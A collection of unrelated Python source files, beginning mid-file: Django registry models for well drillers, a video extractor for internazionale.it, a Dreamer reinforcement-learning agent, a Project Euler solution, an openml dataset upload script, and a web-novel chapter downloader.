        max_length=25, blank=True, null=True, verbose_name='ORCS File # reference.')
    proof_of_age = models.ForeignKey(
        ProofOfAgeCode,
        db_column='registries_proof_of_age_code',
        on_delete=models.PROTECT,
        verbose_name="Proof of age.",
        null=True
    )
    registrar_notes = models.CharField(
        max_length=255,
        blank=True,
        null=True,
        verbose_name='Registrar notes, for internal use only.')
    reason_denied = models.CharField(
        max_length=255,
        blank=True,
        null=True,
        verbose_name='Free form text explaining reason for denial.')
    # TODO Support multiple certificates
    primary_certificate = models.ForeignKey(
        AccreditedCertificateCode,
        blank=True,
        null=True,
        db_column='acc_cert_guid',
        on_delete=models.PROTECT,
        verbose_name="Certificate")
    primary_certificate_no = models.CharField(max_length=50)
    @property
    def current_status(self):
        """Return this application's unexpired status record, or None."""
        try:
            return RegistriesApplicationStatus.objects.get(
                application=self.application_guid,
                expired_date=None)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are no longer swallowed; any lookup failure (missing or
            # duplicate unexpired status rows) is logged and reported as None.
            logger.error('Could not find the current status for application: {}'.format(
                self.application_guid))
            return None
    class Meta:
        db_table = 'registries_application'
        verbose_name_plural = 'Applications'
    def __str__(self):
        return '%s : %s' % (
            self.registration,
            self.file_no)
class RegistriesApplicationStatus(AuditModel):
    """
    Status of a specific Application for the Well Driller and Pump Installer Registries, at a point in time
    """
    application_status_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Register Application Status UUID")
    application = models.ForeignKey(
        RegistriesApplication,
        db_column='application_guid',
        on_delete=models.CASCADE,
        verbose_name="Application Reference",
        related_name="status_set")
    status = models.ForeignKey(
        ApplicationStatusCode,
        db_column='registries_application_status_code',
        on_delete=models.PROTECT,
        verbose_name="Application Status Code Reference")
    notified_date = models.DateField(
        blank=True, null=True, default=datetime.date.today)
    # A row with expired_date=None is the application's current status
    # (see RegistriesApplication.current_status).
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_application_status'
        ordering = ['application', 'effective_date']
        verbose_name_plural = 'Application status'
    def __str__(self):
        return '%s - %s - %s (exp %s)' % (
            self.application,
            self.status.description,
            self.effective_date,
            self.expired_date)
class Register_Note(AuditModel):
    """Free-form internal note attached to a register entry."""
    register_note_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Register Node UUID")
    registration = models.ForeignKey(
        Register,
        db_column='register_guid',
        on_delete=models.PROTECT,
        verbose_name="Register Reference",
        related_name='notes')
    notes = models.TextField(
        max_length=2000,
        blank=True,
        null=True,
        verbose_name='Registrar notes, for internal use only.')
    class Meta:
        db_table = 'registries_register_note'
        verbose_name_plural = 'Registrar Notes'
    def __str__(self):
        return '%s' % (
            self.notes
        )
class OrganizationNote(AuditModel):
    """Timestamped, authored note attached to an organization."""
    org_note_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Company note UUID")
    author = models.ForeignKey(
        User,
        db_column='user_guid',
        on_delete=models.PROTECT,
        verbose_name='Author reference')
    organization = models.ForeignKey(
        Organization,
        db_column='org_guid',
        on_delete=models.PROTECT,
        verbose_name="Company reference",
        related_name="notes")
    date = models.DateTimeField(auto_now_add=True)
    note = models.TextField(max_length=2000)
    class Meta:
        db_table = 'registries_organization_note'
    def __str__(self):
        # Truncate long notes to a 20-character preview.
        return self.note[:20] + ('...' if len(self.note) > 20 else '')
class PersonNote(AuditModel):
    """Timestamped, authored note attached to a person."""
    person_note_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Person note UUID")
    author = models.ForeignKey(
        User,
        db_column='user_guid',
        on_delete=models.PROTECT,
        verbose_name='Author reference')
    person = models.ForeignKey(
        Person,
        db_column='person_guid',
        on_delete=models.PROTECT,
        verbose_name="Person reference",
        related_name="notes")
    date = models.DateTimeField(auto_now_add=True)
    note = models.TextField(max_length=2000)
    class Meta:
        db_table = 'registries_person_note'
    def __str__(self):
        # Truncate long notes to a 20-character preview.
        return self.note[:20] + ('...' if len(self.note) > 20 else '')
"""
Tue Apr 10 10:15:34 2018 Expose DB Views to Django
"""
class vw_well_class(models.Model):
    """Read-only mapping onto the vw_well_class database view (managed = False)."""
    subactivity = models.CharField(
        primary_key=True,
        max_length=10,
        editable=False)
    activity_code = models.ForeignKey(
        ActivityCode,
        db_column='registries_activity_code',
        on_delete=models.PROTECT)
    class_desc = models.CharField(max_length=100)
    class_name = models.CharField(max_length=100)
    class Meta:
        db_table = 'vw_well_class'
        verbose_name = "Registries Well Class"
        verbose_name_plural = "Registries Well Classes"
        managed = False
    def __str__(self):
        # Fixed: the old code referenced self.well_class, which is not a field
        # on this model and raised AttributeError. class_name is the intended
        # display value — confirm against the view definition.
        return '%s %s %s' % (self.subactivity, self.activity_code, self.class_name)
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import unified_timestamp
class InternazionaleIE(InfoExtractor):
    """Extractor for video pages on internazionale.it.

    Video metadata is embedded in the page as ``data-*`` HTML attributes;
    the media itself is served from a video host whose name depends on
    whether the clip is cleared for playback outside Italy.
    """

    _VALID_URL = (
        r"https?://(?:www\.)?internazionale\.it/video/(?:[^/]+/)*(?P<id>[^/?#&]+)"
    )
    _TESTS = [
        {
            "url": "https://www.internazionale.it/video/2015/02/19/richard-linklater-racconta-una-scena-di-boyhood",
            "md5": "3e39d32b66882c1218e305acbf8348ca",
            "info_dict": {
                "id": "265968",
                "display_id": "richard-linklater-racconta-una-scena-di-boyhood",
                "ext": "mp4",
                "title": "Richard Linklater racconta una scena di Boyhood",
                "description": "md5:efb7e5bbfb1a54ae2ed5a4a015f0e665",
                "timestamp": 1424354635,
                "upload_date": "20150219",
                "thumbnail": r"re:^https?://.*\.jpg$",
            },
            "params": {
                "format": "bestvideo",
            },
        },
        {
            "url": "https://www.internazionale.it/video/2018/08/29/telefono-stare-con-noi-stessi",
            "md5": "9db8663704cab73eb972d1cee0082c79",
            "info_dict": {
                "id": "761344",
                "display_id": "telefono-stare-con-noi-stessi",
                "ext": "mp4",
                "title": "Usiamo il telefono per evitare di stare con noi stessi",
                "description": "md5:75ccfb0d6bcefc6e7428c68b4aa1fe44",
                "timestamp": 1535528954,
                "upload_date": "20180829",
                "thumbnail": r"re:^https?://.*\.jpg$",
            },
            "params": {
                "format": "bestvideo",
            },
        },
    ]

    def _real_extract(self, url):
        display_id = self._match_id(url)
        webpage = self._download_webpage(url, display_id)
        # Generic pattern for data-<name>="value" attributes; \1 backreference
        # accepts either quote style without crossing the closing quote.
        DATA_RE = r'data-%s=(["\'])(?P<value>(?:(?!\1).)+)\1'
        title = self._search_regex(
            DATA_RE % "video-title", webpage, "title", default=None, group="value"
        ) or self._og_search_title(webpage)
        video_id = self._search_regex(
            DATA_RE % "job-id", webpage, "video id", group="value"
        )
        video_path = self._search_regex(
            DATA_RE % "video-path", webpage, "video path", group="value"
        )
        video_available_abroad = self._search_regex(
            DATA_RE % "video-available_abroad",
            webpage,
            # BUG FIX: this label only appears in _search_regex error/warning
            # messages; the original said "aboard" instead of "abroad".
            "video available abroad",
            default="1",
            group="value",
        )
        video_available_abroad = video_available_abroad == "1"
        # Geo-restricted clips live on video-ita.internazionale.it instead of
        # video.internazionale.it; both expose m3u8 and mpd manifests.
        video_base = "https://video%s.internazionale.it/%s/%s." % (
            "" if video_available_abroad else "-ita",
            video_path,
            video_id,
        )
        formats = self._extract_m3u8_formats(
            video_base + "m3u8",
            display_id,
            "mp4",
            entry_protocol="m3u8_native",
            m3u8_id="hls",
            fatal=False,
        )
        formats.extend(
            self._extract_mpd_formats(
                video_base + "mpd", display_id, mpd_id="dash", fatal=False
            )
        )
        self._sort_formats(formats)
        timestamp = unified_timestamp(
            self._html_search_meta("article:published_time", webpage, "timestamp")
        )
        return {
            "id": video_id,
            "display_id": display_id,
            "title": title,
            "thumbnail": self._og_search_thumbnail(webpage),
            "description": self._og_search_description(webpage),
            "timestamp": timestamp,
            "formats": formats,
        }
|
from itertools import chain
from math import ceil
from pathlib import Path
from typing import Tuple
import numpy as np
import torch
import torch.distributions as td
from visdom import Visdom
from .optimizer import Optimizer
from .rssm import Rssm, State, kl_divergence_between_states
from .utils import Dataset, FreezeParameters, apply
class Dreamer:
    """Dreamer-style model-based RL agent.

    Learns a latent world model (encoder + RSSM prior/posterior + decoder +
    reward head) from replayed episodes, then trains an actor and a critic
    purely on imagined latent rollouts of that model.
    """

    # Hyper-parameters, shared by all instances.
    train_steps = 100            # gradient steps per update() call
    batch_size = 50              # episodes per batch
    episode_length = 50          # used for the logging timeline only
    horizon = 15                 # imagination rollout length
    deterministic_size = 200     # RSSM deterministic state width
    stochastic_size = 30         # RSSM stochastic state width
    state_dist_type = td.Normal
    free_nats = 3.0              # KL below this is not penalized
    kl_scale = 1.0               # weight of the KL term in the world loss
    discount = 0.99
    discount_lambda = 0.95       # lambda for the lambda-return
    # NOTE(review): created at class-definition time, so importing this module
    # attempts to connect to a visdom server — confirm this is intended.
    visdom = Visdom()

    def __init__(
        self,
        device: torch.device,
        encoder,
        prior,
        posterior,
        decoder,
        reward,
        policy,
        value,
    ):
        """Instantiate all sub-networks (passed in as constructors/classes)
        and move them to *device*."""
        self.device = device
        self.encoder = encoder().to(device)
        self.rssm = Rssm(
            prior=prior(
                deterministic_size=self.deterministic_size,
                stochastic_size=self.stochastic_size,
            ).to(device),
            posterior=posterior(
                obs_embed_size=self.encoder.embed_size,
                deterministic_size=self.deterministic_size,
                stochastic_size=self.stochastic_size,
            ).to(device),
            distribution=self.state_dist_type,
        )
        # The latent "feature" fed to heads is deterministic + stochastic parts.
        feature_size = self.deterministic_size + self.stochastic_size
        self.decoder = decoder(embed_size=feature_size).to(device)
        self.reward = reward(feature_size, 1).to(device)
        self.policy = policy(feature_size).to(device)
        self.value = value(feature_size, 1).to(device)
        self.optimizer = Optimizer(
            world=[
                self.encoder,
                self.rssm.prior,
                self.rssm.posterior,
                self.decoder,
                self.reward,
            ],
            policy=self.policy,
            value=self.value,
        )

    def __call__(
        self, observation: np.ndarray, train: bool = True, random: bool = False
    ) -> np.ndarray:
        """Select an action for a (batched) observation.

        Keeps recurrent state in ``self.state`` / ``self.action`` between
        calls; call :meth:`reset` at episode boundaries.  With ``random=True``
        a uniform random action is returned without touching the model.
        """
        if random:
            # https://github.com/openai/gym/blob/8cf2685db25572e4fd6716565694d05f83000d60/gym/spaces/box.py#L117
            low, high = self.policy.explore.action_range
            action = np.random.uniform(
                low, high, (observation.shape[0], self.policy.action_size)
            )
            return action
        o = torch.tensor(observation).float().to(self.device)
        # Lazily initialize the recurrent state on the first step.
        if not hasattr(self, "state"):
            self.state = State.zero(
                o.size(0),
                self.deterministic_size,
                self.stochastic_size,
                self.device,
            )
        if not hasattr(self, "action"):
            self.action = torch.zeros(
                o.size(0),
                self.policy.action_size,
                device=o.device,
                dtype=o.dtype,
            )
        # Filtering step: predict with the prior, correct with the posterior.
        with torch.no_grad():
            embed_o = self.encoder(o)
            prior = self.rssm.predict(self.state, self.action)
            self.state = self.rssm.update(prior, embed_o)
            a = self.policy(self.state.feature())
            if train:
                # Stochastic action plus exploration noise during training.
                self.action = self.policy.dist(a).sample()
                self.action = self.policy.explore(self.action)
            else:
                # Deterministic (mode) action at evaluation time.
                self.action = self.policy.dist(a).mode()
        return self.action.cpu().numpy()

    def reset(self):
        """Drop the recurrent state so the next __call__ starts fresh."""
        if hasattr(self, "state"):
            delattr(self, "state")
        if hasattr(self, "action"):
            delattr(self, "action")

    def update(self, episode_dir: str):
        """Run ``train_steps`` gradient updates from episodes in *episode_dir*."""
        dataset = Dataset(episode_dir)
        loader = dataset.loader(batch_size=self.batch_size, shuffle=True)
        # Chain enough epochs of the loader to cover train_steps batches.
        repeats = ceil((self.batch_size * self.train_steps) / len(dataset))
        if repeats > 0:
            loaders = [loader] * repeats
            loader = chain(*loaders)
        for step, data in enumerate(loader):
            # the data shape is (time, batch, c, h, w) or (time, batch, 1)
            o = data["o"].float().to(self.device)
            a = data["a"].float().to(self.device)
            r = data["r"].float().to(self.device)
            done = data["done"].float().to(self.device)
            loss_w, posterior = self.world_loss(step, o, a, r, done)
            loss_p, loss_v = self.agent_loss(step, posterior)
            loss = (loss_w.item(), loss_p.item(), loss_v.item())
            print("\r", f"Step: {step}\tLoss(w, p, v): {loss}", end="")
            self.optimizer.zero_grad()
            # World, policy and value losses live on separate graphs
            # (agent_loss detaches the posterior), so three backward calls.
            loss_w.backward()
            loss_p.backward()
            loss_v.backward()
            self.optimizer.clip_grad_norm()
            self.optimizer.step()
            # NOTE(review): `>=` means step index train_steps is still
            # processed, i.e. train_steps + 1 iterations — confirm intended.
            if step >= self.train_steps:
                break
        print()

    def world_loss(
        self,
        step: int,
        o: torch.Tensor,
        a: torch.Tensor,
        r: torch.Tensor,
        done: torch.Tensor,
    ) -> Tuple[torch.Tensor, State]:
        """Reconstruction + reward + KL loss of the world model.

        Returns the scalar loss and the time-stacked posterior states
        (re-used by :meth:`agent_loss` as imagination starting points).
        """
        embed_o = self.rollout(self.encoder, o)
        posterior = State.zero(
            embed_o.size(1),
            self.deterministic_size,
            self.stochastic_size,
            self.device,
        )
        priors, posteriors = [], []
        # Unroll the RSSM over the time axis of the batch.
        for o_i, a_i in zip(embed_o, a):
            prior = self.rssm.predict(posterior, a_i)
            posterior = self.rssm.update(prior, o_i)
            priors.append(prior)
            posteriors.append(posterior)
        features = [p.feature() for p in posteriors]
        prior = State.stack(priors, dim=0)
        posterior = State.stack(posteriors, dim=0)
        # KL(posterior || prior), clipped by free_nats inside the helper.
        div = kl_divergence_between_states(
            prior, posterior, self.free_nats, self.state_dist_type
        )
        recon = self.rollout(self.decoder, features)
        recon_loss = -1.0 * torch.mean(self.decoder.dist(recon).log_prob(o))
        reward = self.rollout(self.reward, features)
        reward_loss = -1.0 * torch.mean(self.reward.dist(reward).log_prob(r))
        loss = self.kl_scale * div + recon_loss + reward_loss
        with torch.no_grad():
            # Only log imagination on the final training step of update().
            if step >= self.train_steps:
                self.log_imagination(step, o, a, recon, posteriors)
        return loss, posterior

    def rollout(self, network, data):
        """Apply *network* to each time slice of *data*; stack along time."""
        x = [network(datum) for datum in data]
        return torch.stack(x, dim=0)

    def agent_loss(
        self, step: int, posterior: State
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        """Actor and critic losses computed on imagined latent rollouts."""
        def detach_and_reshape(data):
            # exclude the last frame which may contain the done-event
            x = data[:-1].detach().clone()
            # merge the time and batch dimensions
            size = x.size()
            x = torch.reshape(x, (size[0] * size[1], -1))
            return x
        s = apply(posterior, detach_and_reshape)
        # World-model weights stay frozen while imagining with the policy.
        with FreezeParameters(self.rssm.prior):
            states = []
            for _ in range(self.horizon):
                a = self.policy(s.detach().feature())
                a = self.policy.dist(a).rsample()
                s = self.rssm.predict(s, a)
                states.append(s)
        features = [s.feature() for s in states]
        feature = torch.stack(features, dim=0)
        with FreezeParameters([self.reward, self.value]):
            # the normal mean is equal to the mode
            reward = self.reward(feature)
            value = self.value(feature)
        discount = self.discount * torch.ones_like(reward)
        returns = self.compute_return(
            reward[:-1],
            value[:-1],
            discount[:-1],
            bootstrap=value[-1],
            lambda_=self.discount_lambda,
        )
        # Make the top row 1 so the cumulative product starts with discount^0
        discount = torch.cat([torch.ones_like(discount[:1]), discount[1:]])
        discount = torch.cumprod(discount[:-1], 0).detach()
        # Actor maximizes discounted lambda-returns.
        policy_loss = -torch.mean(discount * returns)
        # Critic regresses towards the (detached) lambda-returns.
        value_feat = feature[:-1].detach()
        v = returns.detach()
        value = self.value(value_feat)
        value = self.value.dist(value)
        log_prob = value.log_prob(v)
        value_loss = -torch.mean(discount * log_prob.unsqueeze(2))
        return policy_loss, value_loss

    def compute_return(
        self,
        reward: torch.Tensor,
        value: torch.Tensor,
        discount: torch.Tensor,
        bootstrap: torch.Tensor,
        lambda_: float,
    ):
        """
        Compute the discounted reward for a batch of data.
        reward, value, and discount are all shape [horizon - 1, batch, 1]
        (last element is cut off)
        Bootstrap is [batch, 1]

        Implements the lambda-return recursion backwards in time:
        R_t = r_t + gamma * ((1 - lambda) * V(s_{t+1}) + lambda * R_{t+1}).
        """
        next_values = torch.cat([value[1:], bootstrap[None]], 0)
        target = reward + discount * next_values * (1 - lambda_)
        timesteps = list(range(reward.shape[0] - 1, -1, -1))
        outputs = []
        accumulated_reward = bootstrap
        for t in timesteps:
            inp = target[t]
            discount_factor = discount[t]
            accumulated_reward = (
                inp + discount_factor * lambda_ * accumulated_reward
            )
            outputs.append(accumulated_reward)
        # Outputs were accumulated backwards; flip to chronological order.
        returns = torch.flip(torch.stack(outputs), [0])
        return returns

    def log_imagination(
        self,
        step,
        observation,
        action,
        recon,
        posteriors,
        imagination_step: int = 7,
        num_show_episodes: int = 4,
    ):
        """Render reconstruction vs. open-loop imagination to visdom.

        Starting from the posterior at *imagination_step*, rolls the prior
        forward with the recorded actions and shows it next to the ground
        truth for the first *num_show_episodes* episodes.
        """
        s = posteriors[imagination_step - 1]
        def select_episodes(x):
            return x[:num_show_episodes]
        s = apply(s, select_episodes)
        features = []
        for a in action[imagination_step:, :num_show_episodes]:
            s = self.rssm.predict(s, a)
            features.append(s.feature())
        imagination = self.rollout(self.decoder, features)
        # Reconstructions up to the switch point, imagination afterwards.
        inference = torch.cat(
            (recon[:imagination_step, :num_show_episodes], imagination),
            dim=0,
        )
        def make_timeline(data):
            # Every frame up to the horizon, then every 5th frame.
            view_idx = list(range(self.horizon)) + list(
                range(self.horizon, self.episode_length, 5)
            )
            data = [data[i] for i in view_idx]
            data = torch.cat(data, axis=3)
            return data
        inference = make_timeline(inference.cpu())
        observation = make_timeline(observation[:, :num_show_episodes].cpu())
        # Stack ground truth above prediction for each shown episode.
        comps = []
        for o, i in zip(observation, inference):
            comp = torch.cat((o, i), dim=1)
            comps.append(comp)
        comp = torch.cat(comps, dim=1)
        comp = comp[:1]
        # Min-max normalize to [0, 1] for display.
        comp = (comp - torch.min(comp)) * (
            1 / (torch.max(comp) - torch.min(comp)) * 1.0
        )
        self.visdom.image(
            comp,
            win="RSSM",
            opts=dict(
                title="RSSM",
                caption=f"imagination starts from {imagination_step}",
                store_history=True,
            ),
        )

    def save_weight(self, directory: str):
        """Save every sub-network's state_dict under *directory*."""
        Path(directory).mkdir(parents=True, exist_ok=True)
        def save(network, filename):
            torch.save(network.state_dict(), filename)
        save(self.encoder, f"{directory}/encoder.pkl")
        save(self.rssm.prior, f"{directory}/prior.pkl")
        save(self.rssm.posterior, f"{directory}/posterior.pkl")
        save(self.decoder, f"{directory}/decoder.pkl")
        save(self.reward, f"{directory}/reward.pkl")
        save(self.policy, f"{directory}/policy.pkl")
        save(self.value, f"{directory}/value.pkl")
        save(self.optimizer, f"{directory}/optimizer.pkl")

    def load_weight(self, directory: str):
        """Restore every sub-network's state_dict from *directory*."""
        def load(network, filename):
            network.load_state_dict(torch.load(filename))
        load(self.encoder, f"{directory}/encoder.pkl")
        load(self.rssm.prior, f"{directory}/prior.pkl")
        load(self.rssm.posterior, f"{directory}/posterior.pkl")
        load(self.decoder, f"{directory}/decoder.pkl")
        load(self.reward, f"{directory}/reward.pkl")
        load(self.policy, f"{directory}/policy.pkl")
        load(self.value, f"{directory}/value.pkl")
        load(self.optimizer, f"{directory}/optimizer.pkl")
|
def even_fib_sum(limit=4000000):
    """Return the sum of the even-valued Fibonacci terms not exceeding *limit*.

    Project Euler problem 2 (classic limit: four million).

    BUG FIX: the original checked the loop condition *before* generating the
    next term, so one term beyond the limit was still tested and — had it
    been even — added to the sum.  Here a term is only accumulated after it
    has been verified to be <= limit.
    """
    previous, current = 0, 1
    total = 0
    while True:
        previous, current = current, previous + current
        if current > limit:
            break
        if current % 2 == 0:
            total += current
    return total


# Same observable behavior as before: print the four-million answer.
print(str(even_fib_sum()))
|
'''
This script uploads our datasets into openml with its API. It then produces a python snippet
to be pasted in the web page to import the dataset via sklearn through openml
Notes:
1. We remove non-ascii characters within the categorical (nominal) values (it does not work if we don't do this)
2. We remove the lines with missing values in the target variable
Usage:
my_script.py <datasets_folder> <output_snippet_folder> <main_csv_file> [options]
Arguments:
<datasets_folder> A folder with dgf resources ids and csv files within
    <output_snippet_folder>       A folder where the generated python import snippets will be written
<main_csv_file> The path of the main csv file used in the website
'''
# Load environment variables from a local .env file before reading the API key.
from dotenv import load_dotenv
load_dotenv(verbose=True)
import logging
import os
# openml.org API key; expected in the environment (possibly via the .env file).
openml_apikey = os.getenv("openml_apikey")
from pathlib import Path
import pandas as pd
from csv_detective.explore_csv import routine
from argopt import argopt
from tqdm import tqdm
import openml
from openml.datasets.functions import create_dataset
from app.apps.utils import slugify
# NOTE(review): this switches the client to openml's *test* server, not
# production — confirm before publishing real datasets.
openml.config.start_using_configuration_for_example()
openml.config.apikey = openml_apikey
def split_cell_value(value):
    """Clip *value* to at most 256 characters.

    openml rejects overly long nominal values; anything longer than 256
    characters is truncated (with a printed warning), shorter values pass
    through untouched.
    """
    if len(value) <= 256:
        return value
    print(f"Value {value} was limited to 256 chars bc it was too long")
    return value[:256]
def main(datasets_folder: Path, output_folder: Path, main_csv_file: Path):
    """Upload every dataset found under *datasets_folder* to openml.

    Each sub-folder is named after a dgf resource id and must contain a csv
    file named ``<id>.*``.  Dataset metadata (title, target variable) is
    looked up in *main_csv_file*.

    :raises FileNotFoundError: if any of the three paths does not exist
    :return: list of produced doc paths (currently always empty)
    """
    doc_paths = []
    if not datasets_folder.exists():
        raise FileNotFoundError(datasets_folder.as_posix())
    if not output_folder.exists():
        raise FileNotFoundError(output_folder.as_posix())
    if not main_csv_file.exists():
        raise FileNotFoundError(main_csv_file.as_posix())
    main_csv = pd.read_csv(main_csv_file)
    list_subfolders_with_paths = [Path(f.path) for f in os.scandir(datasets_folder.as_posix()) if f.is_dir()]
    for path in list_subfolders_with_paths:
        id_dataset = path.name
        dataset_file = [Path(f) for f in path.glob(f"{id_dataset}.*")]
        if not dataset_file:
            # BUG FIX: the original only logged and then fell through to
            # dataset_file[0], raising IndexError; skip the folder instead.
            logging.debug(f"There was not dataset for {id_dataset}")
            continue
        # csv_detective guesses separator and encoding so pandas can parse it.
        dataset_metadata = routine(dataset_file[0], user_input_tests=None)
        df_dataset = pd.read_csv(dataset_file[0], sep=dataset_metadata["separator"],
                                 encoding=dataset_metadata["encoding"])
        dataset_info = main_csv[main_csv['dgf_resource_id'] == id_dataset]
        # openml chokes on non-ascii text, so strip it from the description.
        description = dataset_info['title'][dataset_info.index.to_list()[0]]
        description = description.encode('utf-8').decode('ascii', 'ignore')
        target_var = slugify(dataset_info['target_variable'][dataset_info.index.to_list()[0]])
        df_dataset.rename(columns=slugify, inplace=True)
        # Drop rows whose target value is missing.
        df_dataset = df_dataset[df_dataset[target_var].notna()]
        # enforce the categorical column to have a categorical dtype
        for cat_var in df_dataset.select_dtypes(include='object').columns.to_list():
            df_dataset[cat_var] = df_dataset[cat_var].astype('category')
            df_dataset[cat_var] = df_dataset[cat_var].apply(
                lambda x: split_cell_value(x).encode('utf-8').decode('ascii', 'ignore'))
        name = f"dgf_{id_dataset}"
        try:
            new_dataset = create_dataset(
                name=name,
                description=description,
                creator="dgml_test",
                contributor="dgml_test",
                collection_date="20-05-2021",
                language="French",
                licence="Undefined",
                default_target_attribute=target_var,
                row_id_attribute=None,
                ignore_attribute=None,
                citation="dgf test",
                attributes='auto',
                data=df_dataset,
                version_label="example",
                original_data_url="url_dgml"
            )
            new_dataset.data_file = dataset_file[0]
            data_id = new_dataset.publish()
            print(f"The dataid of the resource is: {data_id}")
        except Exception as e:
            # Best-effort upload: report the failure and move to the next dataset.
            print(e)
    return doc_paths
if __name__ == '__main__':
    # argopt builds the CLI parser from the module docstring (docopt syntax).
    parser = argopt(__doc__).parse_args()
    datasets_folder = Path(parser.datasets_folder)
    output_snippet_folder = Path(parser.output_snippet_folder)
    main_csv_file = Path(parser.main_csv_file)
    main(datasets_folder=datasets_folder, output_folder=output_snippet_folder,
         main_csv_file=main_csv_file)
|
import numpy as np
"""
some really utils functions
"""
def get_score_label_array_from_dict(score_dict, label_dict):
    """Collapse per-key score/label lists into two aligned float arrays.

    :param score_dict: defaultdict(list) mapping key -> list of scores
    :param label_dict: defaultdict(list) mapping key -> list of labels
    :return: (score, label) numpy arrays, one entry per key of score_dict,
             each entry being the max of the corresponding list
    """
    assert len(score_dict) == len(label_dict), "The score_dict and label_dict don't match"
    score = np.array([max(values) for values in score_dict.values()], dtype=float)
    label = np.array([max(label_dict[key]) for key in score_dict], dtype=float)
    return score, label
import os
from src.Downloaders import *
def archiveUpdate(dirList=None, keep_text_format=False):
    """Fetch newly released chapters for every novel folder in ./novel_list.

    :param dirList: folder names to update; defaults to every entry of
        ./novel_list.  (Changed from a mutable ``[]`` default — a classic
        Python pitfall — to ``None``; behavior is identical because the
        original only tested truthiness and never mutated the list.)
    :param keep_text_format: forwarded to Novel; keep the source text format.
    """
    if not dirList:
        dirList = os.listdir('./novel_list')
    print("list=")
    print(dirList)
    for novel_folder in dirList:
        print()
        # Folder names are "<code> <title>"; the site-specific fetcher is
        # chosen by updateObject() from the code.
        novel_name, code = getNovelInfoFromFolderName(novel_folder)
        novel = Novel(code, novel_name, keep_text_format)
        novel = novel.updateObject()
        if novel == 0:
            print(novel_folder + ' couldnt be updated because the code doesnt match known formats')
            continue
        # Chapters are stored as "<number>_<...>"; find the highest number
        # already on disk (0 when the folder is empty).
        chapter_list = os.listdir('./novel_list/%s' % novel_folder)
        last_downloaded = max(
            (int(chap[:chap.find('_')]) for chap in chapter_list), default=0)
        novel.setLastChapter(last_downloaded)
        # Fetch everything newer than the last stored chapter.
        novel.setDir('./novel_list/' + novel_folder)
        novel.processNovel()
def archiveFullUpdate(dirList=[], force=False):
    """Re-download any chapter missing from each local novel folder.

    Unlike archiveUpdate, this scans all stored chapter numbers and fetches
    every gap up to the highest one; with ``force=True`` every chapter is
    re-fetched.  NOTE(review): the ``[]`` default is a mutable default
    argument — harmless here since it is only reassigned, never mutated.
    """
    if not dirList:
        dirList = os.listdir('./novel_list')
    for novel_folder in dirList:
        print()
        NFs = getNovelInfoFromFolderName(novel_folder)
        novel_name = NFs[0]  # novel_folder[code:]
        code = NFs[1]  # novel_folder[:code]
        # The site-specific fetcher is chosen by updateObject() from the code.
        novel = Novel(code, novel_name)
        novel = novel.updateObject()
        if(novel == 0):
            print(novel_folder + ' couldnt be updated')
            continue
        # Collect the chapter numbers already stored locally and track the
        # highest one (chapter files are named "<number>_<...>").
        chapter_list = os.listdir('./novel_list/%s' % novel_folder)
        novel.setDir('./novel_list/' + code + novel_name)
        last_downloaded = 0
        code_list = []
        for nov in chapter_list:
            chapter_code = nov.find('_')
            chapter_code = nov[:chapter_code]
            code_list.append(chapter_code)
            if(int(last_downloaded) < int(chapter_code)):
                last_downloaded = chapter_code
        print(last_downloaded)
        print(code_list)
        # Re-fetch every chapter number that is missing (or all, if forced).
        for i in range(0, int(last_downloaded)):
            if '%s' % i not in code_list or force == True:
                print('no ' + str(i))
                if int(i) == 0 and isinstance(novel, SyosetuNovel):
                    # Chapter 0 is the table of contents / resume page.
                    novel.processTocResume()
                    continue
                elif isinstance(novel, SyosetuNovel):
                    # Workaround: processChapter relies on the stored
                    # last-chapter counter instead of taking it directly.
                    novel.setLastChapter(int(i))
                    chap = int(i)
                    novel.processChapter(chap)
                    continue
                # TODO:
                elif isinstance(novel, KakuyomuNovel):
                    novel.setLastChapter(last_downloaded)
                    novel.setDir('./novel_list/' + novel_folder)
                    novel.processNovel()
        # Finally fetch anything newer than the highest stored chapter.
        novel.setLastChapter(int(last_downloaded))
        novel.processNovel()
# return code and novel name from input.txt
def getInputFile():
    """Read input.txt and return a list of ``[code, novel_name]`` pairs.

    Each line of input.txt is expected to look like ``code;novel name``.

    Improvements over the original: the file is opened read-only (it was
    opened ``'r+'`` although nothing is ever written) and inside a context
    manager, so it is closed even if parsing raises.
    """
    novel_list = []
    with open('input.txt', 'r', encoding='utf-8') as inputfile:
        for line in inputfile:
            print("{}".format(line.strip()))
            separator = line.find(';')
            code = line[:separator]
            # strip() removes the trailing newline / carriage return.
            novel_name = line[separator + 1:].strip()
            novel_list.append([code, novel_name])
    return novel_list
# return code and novel name from novel folder
def getNovelInfoFromFolderName(folderName):
    """Split a folder name of the form "<code> <title>" into [title, code]."""
    sep = folderName.find(' ')
    title = folderName[sep + 1:].strip()
    return [title, folderName[:sep]]
def download(keep_text_format=False):
    """Download every novel listed in input.txt into ./novel_list.

    Skips entries without a code and novels whose folder already exists.

    :param keep_text_format: forwarded to Novel; keep the source text format.
    """
    if('novel_list' not in os.listdir('.')):
        os.mkdir('novel_list')
    novel_list = getInputFile()
    for novel_info in novel_list:
        code = novel_info[0]
        if code == '':
            continue
        name = novel_info[1]
        #print('i '+name)
        print(keep_text_format)
        # The site-specific fetcher is chosen by updateObject() from the code.
        novel = Novel(code, name, keep_text_format)
        novel = novel.updateObject()
        if(novel == 0):
            continue
        #detect if the novel has already been downloaded
        match = findNovel(code)
        if (len(match) > 0):
            print(match[0][:25] + '... \t folder already exists')
            continue
        dir = ''
        if (name == ''):
            # No name in input.txt: fetch the title from the site itself.
            dir = './novel_list/'
            name = novel.getNovelTitle()
            name = checkTitle(name)
            print(name)
            dir += code + ' ' + name
            print(dir)
        else:
            name = checkTitle(name)
            dir = './novel_list/' + code + ' ' + name
            if code + ' ' + name not in match:
                try:
                    os.mkdir('%s' % dir)
                except FileExistsError:
                    print("the folder already exists")
                    continue
            else:
                print(code + ' ' + name + ' folder already imported, update to fetch updates')
                continue
